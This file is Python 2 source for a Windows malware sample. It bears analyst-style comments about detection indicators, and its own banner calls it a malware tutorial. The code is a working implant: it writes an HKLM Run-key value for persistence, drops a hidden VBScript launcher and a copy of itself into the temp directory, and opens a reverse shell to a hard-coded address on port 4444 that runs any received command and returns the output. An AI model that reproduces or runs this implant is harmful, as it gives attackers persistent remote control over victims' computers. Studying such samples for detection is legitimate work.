  1.  
  2. import os
  3. import subprocess
  4. import socket
  5. import sys
  6. import tempfile
  7. from _winreg import *
  8.  
# Sample configuration. Everything an analyst needs for a detection rule is
# hard-coded below: the dropped file names, the autorun key/value name, and
# the call-back address and port.
MALWARE_NAME = "malware.exe"
# Launcher script name derived from the executable name ("malware.vbs").
TRIGGER = MALWARE_NAME.replace('.exe','')+".vbs"
# Autorun key under HKLM (written in My_malware.infect_windows_register_keys).
# None of the backslash sequences here is a recognised Python escape, so the
# path string keeps its backslashes as written.
KEY_PATH = "Software\Microsoft\Windows\CurrentVersion\Run"
KEY_NAME = "anarc0der_key"
# Hard-coded command-and-control endpoint: a static network indicator.
REV_SHELL = "192.168.1.106"
SHELL_PORT = 4444
# Both dropped artefacts live in the temp directory (host indicators).
TRIGGER_PATH = tempfile.gettempdir()+"\\"+TRIGGER
MALWARE_PATH = tempfile.gettempdir()+"\\"+MALWARE_NAME
  17.  
class My_malware():
    """Persistence + dropper + reverse-shell sample (Windows; Python 2 judging
    by the ``_winreg`` import and str-based socket sends).

    Observable behaviour, in the order main() calls it:
      * infect_windows_register_keys - adds a value under the HKLM Run key.
      * hide_malware_and_trigger     - drops a .vbs launcher and a copy of the
        executable into the temp directory.
      * reverse_shell_function       - outbound TCP to REV_SHELL:SHELL_PORT,
        then runs every received chunk through a shell.
    """

    def infect_windows_register_keys(self):
        """ Method to register malware on windows keys.
        Returns False if didnt have key for malware.
        Returns True if already have key for malware. """
        # Default (read) access is enough to enumerate the existing value names.
        key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH)
        keys = []
        try:
            i=0
            while True:
                cur_key = EnumValue(key, i)
                # EnumValue returns (name, data, type); only the name is kept.
                keys.append(cur_key[0])
                i+=1
        except:
            # EnumValue raises once the index runs past the last value. The bare
            # except also swallows any other failure, so an access error is
            # indistinguishable from an empty key at this point.
            pass
        if KEY_NAME not in keys:
            # Persistence artefact: HKLM\<KEY_PATH>\<KEY_NAME> = TRIGGER_PATH.
            # Writing under HKLM presumably requires an elevated process.
            mlwr_key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH, 0, KEY_ALL_ACCESS)
            SetValueEx(mlwr_key, KEY_NAME, 0, REG_SZ, TRIGGER_PATH)
            mlwr_key.Close()
            return False
        return True

    def hide_malware_and_trigger(self):
        """ Method to generate & hide the trigger and malware.
        Return True if was alredy hided.
        Return False if wasnt hided """
        if os.path.exists(MALWARE_PATH) and os.path.exists(TRIGGER_PATH):
            return True
        else:
            # VBScript launcher: WScript.Shell.Run of MALWARE_PATH with window
            # style 0 (no visible window) and no wait. The Run key points at
            # this .vbs, so the executable is started indirectly, presumably via
            # the .vbs file association (wscript.exe) rather than directly.
            payload = 'Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false'.format(MALWARE_PATH)
            with open(TRIGGER_PATH, 'w') as f:
                f.write(payload)
            # Copies the binary from the current working directory into temp via
            # a cmd.exe `copy` spawned by os.system; the return code is not checked.
            os.system('copy %s %s'%(MALWARE_NAME, MALWARE_PATH))
            return False

    def reverse_shell_function(self):
        """ Method of reverse shell in python """
        # Outbound TCP connection to the hard-coded endpoint: the network indicator.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((REV_SHELL,SHELL_PORT))
        # Banner is sent as a str (Python 2 semantics); "\!" is not a Python
        # escape and is transmitted literally.
        s.send('\n\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n')
        while True:
            # One command per received chunk; input longer than 1024 bytes is
            # split across iterations.
            data = s.recv(1024)
            if "quit" in data:
                break
            # Whatever the remote side sent is handed unchanged to a shell:
            # unauthenticated remote command execution.
            cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            # Combined stdout+stderr is sent back, followed by a prompt
            # ("Comando" is Portuguese for "command").
            saida_cmd = cmd.stdout.read() + cmd.stderr.read()
            s.send(saida_cmd)
            s.send("Comando: ")
        s.close()
  68.  
def main():
    """Entry point.

    Sets up persistence and drops the files, and only calls home when both
    steps report their artefacts were already present - i.e. on a later run
    (presumably from the Run key launcher), not on the first execution.
    """
    my_returns = []
    x = My_malware()
    # True only if the Run value already existed.
    my_returns.append(x.infect_windows_register_keys())
    # True only if both temp-directory artefacts already existed.
    my_returns.append(x.hide_malware_and_trigger())
    if all(res is True for res in my_returns):
        x.reverse_shell_function()
  76.  
# Script entry guard: main() runs only when executed directly, not on import.
if __name__ == '__main__':
    main()